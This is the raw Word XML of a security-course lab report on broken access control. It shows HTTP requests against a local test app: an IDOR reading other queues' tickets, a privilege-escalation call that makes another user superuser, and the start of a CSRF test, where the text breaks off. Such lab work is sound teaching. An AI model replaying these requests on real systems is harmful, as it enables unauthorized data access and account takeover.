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612038203"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="221DA5D1" w14:textId="77777777" w:rsidR="006D56E8" w:rsidRDefault="006D56E8" w:rsidP="006D56E8">
          <w:pPr>
            <w:pStyle w:val="NoSpacing"/>
            <w:spacing w:before="1540" w:after="240"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62570C90" wp14:editId="4089D23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25DD466527EB416581C977C9A00A5F5E"/>
            </w:placeholder>
            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
            <w:text/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w14:paraId="666EFA39" w14:textId="4A98C780" w:rsidR="006D56E8" w:rsidRDefault="00EC2774" w:rsidP="006D56E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Lab </w:t>
              </w:r>
              <w:r w:rsidR="00EE142C">
                <w:rPr>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                  <w:caps/>
                  <w:color w:val="156082" w:themeColor="accent1"/>
                  <w:sz w:val="72"/>
                  <w:szCs w:val="72"/>
                </w:rPr>
                <w:t>3</w:t>
              </w:r>
              <w:r w:rsidR="0076327A">
                <w:rPr>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                  <w:caps/>
                  <w:color w:val="156082" w:themeColor="accent1"/>
                  <w:sz w:val="72"/>
                  <w:szCs w:val="72"/>
                </w:rPr>
                <w:t xml:space="preserve"> – </w:t>
              </w:r>
              <w:r w:rsidR="00EE142C">
                <w:rPr>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                  <w:caps/>
                  <w:color w:val="156082" w:themeColor="accent1"/>
                  <w:sz w:val="72"/>
                  <w:szCs w:val="72"/>
                </w:rPr>
                <w:t>Broken access control and command injection</w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:color w:val="156082" w:themeColor="accent1"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:alias w:val="Subtitle"/>
            <w:tag w:val=""/>
            <w:id w:val="328029620"/>
            <w:placeholder>
              <w:docPart w:val="B1B9817C43AD46FE8D248A33EAAE3847"/>
            </w:placeholder>
            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
            <w:text/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w14:paraId="4A82387E" w14:textId="77777777" w:rsidR="006D56E8" w:rsidRDefault="006D56E8" w:rsidP="006D56E8">
              <w:pPr>
                <w:pStyle w:val="NoSpacing"/>
                <w:jc w:val="center"/>
                <w:rPr>
                  <w:color w:val="156082" w:themeColor="accent1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:color w:val="156082" w:themeColor="accent1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                </w:rPr>
                <w:t>EECE503M: Software &amp; AI Security</w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
        <w:p w14:paraId="00BE272C" w14:textId="77777777" w:rsidR="006D56E8" w:rsidRDefault="006D56E8" w:rsidP="006D56E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2537DE0" wp14:editId="5810BCA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21T00:00:00Z">
                                    <w:dateFormat w:val="MMMM d, yyyy"/>
                                    <w:lid w:val="en-US"/>
                                    <w:storeMappedDataAs w:val="dateTime"/>
                                    <w:calendar w:val="gregorian"/>
                                  </w:date>
                                </w:sdtPr>
                                <w:sdtEndPr/>
                                <w:sdtContent>
                                  <w:p w14:paraId="51DD189B" w14:textId="0BE32CC2" w:rsidR="006D56E8" w:rsidRPr="00E12E7D" w:rsidRDefault="00EE142C" w:rsidP="006D56E8">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:spacing w:after="40"/>
                                      <w:jc w:val="center"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="156082" w:themeColor="accent1"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="156082" w:themeColor="accent1"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>October 21, 2026</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w14:paraId="2A05DE95" w14:textId="3337C164" w:rsidR="006D56E8" w:rsidRDefault="00864A2E" w:rsidP="006D56E8">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6D56E8">
                                      <w:rPr>
                                        <w:color w:val="156082" w:themeColor="accent1"/>
                                      </w:rPr>
                                      <w:t>Ziad Abillama</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="3E38BFAA" w14:textId="77777777" w:rsidR="006D56E8" w:rsidRDefault="006D56E8" w:rsidP="006D56E8">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:jc w:val="center"/>
                                  <w:rPr>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00D358C4">
                                  <w:rPr>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                  </w:rPr>
                                  <w:t>https://github.com/ZiadAbillama/EECE503M-Lab</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537DE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21T00:00:00Z">
                              <w:dateFormat w:val="MMMM d, yyyy"/>
                              <w:lid w:val="en-US"/>
                              <w:storeMappedDataAs w:val="dateTime"/>
                              <w:calendar w:val="gregorian"/>
                            </w:date>
                          </w:sdtPr>
                          <w:sdtEndPr/>
                          <w:sdtContent>
                            <w:p w14:paraId="51DD189B" w14:textId="0BE32CC2" w:rsidR="006D56E8" w:rsidRPr="00E12E7D" w:rsidRDefault="00EE142C" w:rsidP="006D56E8">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:spacing w:after="40"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="156082" w:themeColor="accent1"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="156082" w:themeColor="accent1"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>October 21, 2026</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w14:paraId="2A05DE95" w14:textId="3337C164" w:rsidR="006D56E8" w:rsidRDefault="00864A2E" w:rsidP="006D56E8">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6D56E8">
                                <w:rPr>
                                  <w:color w:val="156082" w:themeColor="accent1"/>
                                </w:rPr>
                                <w:t>Ziad Abillama</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="3E38BFAA" w14:textId="77777777" w:rsidR="006D56E8" w:rsidRDefault="006D56E8" w:rsidP="006D56E8">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00D358C4">
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                            </w:rPr>
                            <w:t>https://github.com/ZiadAbillama/EECE503M-Lab</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap anchorx="margin" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15237C44" wp14:editId="0D62FC6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9F17DF5" w14:textId="77777777" w:rsidR="006D56E8" w:rsidRDefault="006D56E8" w:rsidP="006D56E8">
          <w:pPr>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="47A0F68F" w14:textId="3267CA51" w:rsidR="0014095E" w:rsidRPr="0014095E" w:rsidRDefault="006D56E8" w:rsidP="0014095E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Part A: </w:t>
      </w:r>
      <w:r w:rsidR="00E7575C">
        <w:t>Broken access control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B1617" w14:textId="0EA66E81" w:rsidR="006D56E8" w:rsidRDefault="006D56E8" w:rsidP="006D56E8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A1 – </w:t>
      </w:r>
      <w:r w:rsidR="007C491F">
        <w:t>IDOR across the queue boundary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B58AE34" w14:textId="77777777" w:rsidR="00AD00C5" w:rsidRPr="00AD00C5" w:rsidRDefault="00AD00C5" w:rsidP="00AD00C5">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD00C5">
        <w:t>rmasri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD00C5">
        <w:t xml:space="preserve"> is scoped to the Customer Support queue only. Ticket 4 belongs to the Billing queue and should not be visible to this account. Requesting it directly by id returns the full ticket detail, including the invoice reference “Invoice 4471”, with no access-control check performed.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD00C5" w14:paraId="20416E14" w14:textId="77777777" w:rsidTr="00AD00C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1A6498AA" w14:textId="18E94D52" w:rsidR="00AD00C5" w:rsidRDefault="003251C6" w:rsidP="003251C6">
            <w:r w:rsidRPr="003251C6">
              <w:t>GET /tickets/4/ HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="003251C6">
              <w:br/>
              <w:t>Host: 127.0.0.1:5001</w:t>
            </w:r>
            <w:r w:rsidRPr="003251C6">
              <w:br/>
              <w:t xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003251C6">
              <w:t>csrftoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003251C6">
              <w:t xml:space="preserve">=...; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003251C6">
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003251C6">
              <w:t>=...</w:t>
            </w:r>
            <w:r w:rsidRPr="003251C6">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="003251C6">
              <w:br/>
              <w:t>→ 200 OK — ticket #4 “Invoice 4471 charged twice”, Queue: Billing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76AE3834" w14:textId="2133DCF3" w:rsidR="00AD00C5" w:rsidRDefault="00067C50" w:rsidP="00067C50">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11D0064C" wp14:editId="05BEF83A">
            <wp:extent cx="6858000" cy="3676650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="939512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676650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC8033" w14:textId="3D54F358" w:rsidR="00067C50" w:rsidRDefault="00B16274" w:rsidP="00B16274">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007F1F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B11DC">
        <w:t xml:space="preserve">Ticket #4 (Billing queue) read directly by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B11DC">
        <w:t>rmasri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B11DC">
        <w:t xml:space="preserve"> via /tickets/4/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC6038" w14:textId="412C94C5" w:rsidR="008466A0" w:rsidRPr="008466A0" w:rsidRDefault="008466A0" w:rsidP="008466A0">
      <w:r w:rsidRPr="008466A0">
        <w:t xml:space="preserve">To confirm this is a systematic flaw rather than a one-off, a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008466A0">
        <w:t>neighbouring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008466A0">
        <w:t xml:space="preserve"> id (ticket 3) was requested the same way. It also returns in full, confirming the ticket-detail endpoint performs no ownership or queue check on any id</w:t>
      </w:r>
      <w:r>
        <w:t>, o</w:t>
      </w:r>
      <w:r w:rsidRPr="008466A0">
        <w:t>nly the account's own login state is checked, not what that account is entitled to see.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D02A2C" w14:paraId="5C4286E5" w14:textId="77777777" w:rsidTr="00D02A2C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2EE68329" w14:textId="3AC2C67C" w:rsidR="00D02A2C" w:rsidRDefault="00D02A2C" w:rsidP="00D02A2C">
            <w:r w:rsidRPr="00D02A2C">
              <w:t>GET /tickets/3/ HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00D02A2C">
              <w:br/>
              <w:t>Host: 127.0.0.1:5001</w:t>
            </w:r>
            <w:r w:rsidRPr="00D02A2C">
              <w:br/>
              <w:t xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D02A2C">
              <w:t>csrftoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D02A2C">
              <w:t xml:space="preserve">=...; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D02A2C">
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D02A2C">
              <w:t>=...</w:t>
            </w:r>
            <w:r w:rsidRPr="00D02A2C">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00D02A2C">
              <w:br/>
              <w:t xml:space="preserve">→ 200 OK — ticket #3 “Export of closed tickets is empty”, assigned to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D02A2C">
              <w:t>tokafor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="599CA23A" w14:textId="77777777" w:rsidR="00015617" w:rsidRDefault="00A460E9" w:rsidP="00015617">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F0C2E6" wp14:editId="2CC7F187">
            <wp:extent cx="6858000" cy="3686175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="124451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686175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C312559" w14:textId="76E46D3F" w:rsidR="00015617" w:rsidRDefault="00015617" w:rsidP="00015617">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007F1F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00235A9E">
        <w:t xml:space="preserve">A second ticket (#3), not owned or assigned to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00235A9E">
        <w:t>rmasri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00235A9E">
        <w:t>, read the same way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647509C3" w14:textId="3250EEB3" w:rsidR="008A7B6B" w:rsidRPr="00B16274" w:rsidRDefault="0047678D" w:rsidP="0047678D">
      <w:r w:rsidRPr="0047678D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result:  </w:t>
      </w:r>
      <w:r w:rsidRPr="0047678D">
        <w:t>Confirmed</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0047678D">
        <w:t xml:space="preserve"> the ticket id alone gates access to ticket data; ids are sequential and guessable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A9E342" w14:textId="20E3B8ED" w:rsidR="006D56E8" w:rsidRDefault="006D56E8" w:rsidP="006D56E8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A2 – </w:t>
      </w:r>
      <w:r w:rsidR="007C491F">
        <w:t>Vertical privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62755093" w14:textId="77777777" w:rsidR="004473FE" w:rsidRPr="004473FE" w:rsidRDefault="004473FE" w:rsidP="004473FE">
      <w:r w:rsidRPr="004473FE">
        <w:t xml:space="preserve">The admin tool at /admin-tools/promote/ is intended for administrators to grant superuser rights. It checks only that the requester is signed in as staff, not that they already hold administrator rights. As </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473FE">
        <w:t>rmasri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473FE">
        <w:t>, a plain support agent, the endpoint was called against another account:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="004473FE" w14:paraId="48E6384D" w14:textId="77777777" w:rsidTr="00771CB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5BD9AD9D" w14:textId="7812E361" w:rsidR="004473FE" w:rsidRDefault="00771CB7" w:rsidP="00771CB7">
            <w:r w:rsidRPr="00771CB7">
              <w:t>GET /admin-tools/promote/?user=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00771CB7">
              <w:t>tokafor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00771CB7">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00771CB7">
              <w:br/>
              <w:t>Host: 127.0.0.1:5001</w:t>
            </w:r>
            <w:r w:rsidRPr="00771CB7">
              <w:br/>
              <w:t xml:space="preserve">Cookie: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00771CB7">
              <w:t>csrftoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00771CB7">
              <w:t xml:space="preserve">=...; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00771CB7">
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00771CB7">
              <w:t>=...</w:t>
            </w:r>
            <w:r w:rsidRPr="00771CB7">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00771CB7">
              <w:br/>
              <w:t>→ 200 OK  {"user":"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00771CB7">
              <w:t>tokafor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00771CB7">
              <w:t>","</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00771CB7">
              <w:t>is_superuser":true</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00771CB7">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AD67473" w14:textId="77777777" w:rsidR="00E64B98" w:rsidRDefault="00771CB7" w:rsidP="00E64B98">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B416FDF" wp14:editId="63A065AA">
            <wp:extent cx="6858000" cy="3686175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1813719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3686175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E049FF8" w14:textId="1C832A5E" w:rsidR="0047678D" w:rsidRDefault="00E64B98" w:rsidP="00E64B98">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007F1F8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E3594">
        <w:t>rmasri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E3594">
        <w:t xml:space="preserve">, a non-admin agent, successfully promotes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E3594">
        <w:t>tokafor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E3594">
        <w:t xml:space="preserve"> to superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3373F124" w14:textId="70C2AB4D" w:rsidR="00771CB7" w:rsidRPr="0047678D" w:rsidRDefault="00FC022B" w:rsidP="00FC022B">
      <w:r w:rsidRPr="00FC022B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC022B">
        <w:t>Confirmed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC022B">
        <w:t>any authenticated staff account can grant superuser rights to any user, including itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B315F86" w14:textId="0D80D9FC" w:rsidR="007C491F" w:rsidRDefault="007C491F" w:rsidP="007C491F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>A3 – Cross-site request forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3A3A1E" w14:textId="50C00A06" w:rsidR="00F83CB4" w:rsidRPr="00F83CB4" w:rsidRDefault="00F83CB4" w:rsidP="00F83CB4">
      <w:r w:rsidRPr="00F83CB4">
        <w:t xml:space="preserve">The “change e-mail” action at /profile/email/ is a state-changing POST endpoint. A request was sent with the CSRF token cookie retained (so the session stays authenticated) but with no CSRF token field in the request body and no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F83CB4">
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F83CB4">
        <w:t xml:space="preserve"> or Origin header present</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83CB4">
        <w:t xml:space="preserve"> reproducing what a third-party page could send from a victim's browser.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="005D3D36" w14:paraId="05FFAE75" w14:textId="77777777" w:rsidTr="005D3D36">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
